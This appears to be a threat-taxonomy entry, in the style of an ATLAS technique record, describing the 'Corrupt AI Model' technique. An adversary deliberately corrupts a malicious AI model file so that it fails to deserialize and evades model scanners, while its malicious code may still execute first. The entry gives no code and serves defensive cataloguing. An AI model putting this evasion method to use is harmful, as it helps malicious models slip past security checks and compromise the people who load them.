Corrupt AI Model
Type: technique
Description: An adversary may purposefully corrupt a malicious AI model file so that it cannot be successfully deserialized in order to evade detection by a model scanner. The corrupt model may still successfully execute malicious code before deserialization fails.
Version: 0.1.0
Created At: 2025-12-22 07:58:23 -0500
Last Modified At: 2025-12-22 07:58:23 -0500
External References
Related Objects
- --> Defense Evasion (tactic): An adversary can corrupt a malicious AI model file so that it cannot be successfully deserialized in order to evade detection by a model scanner.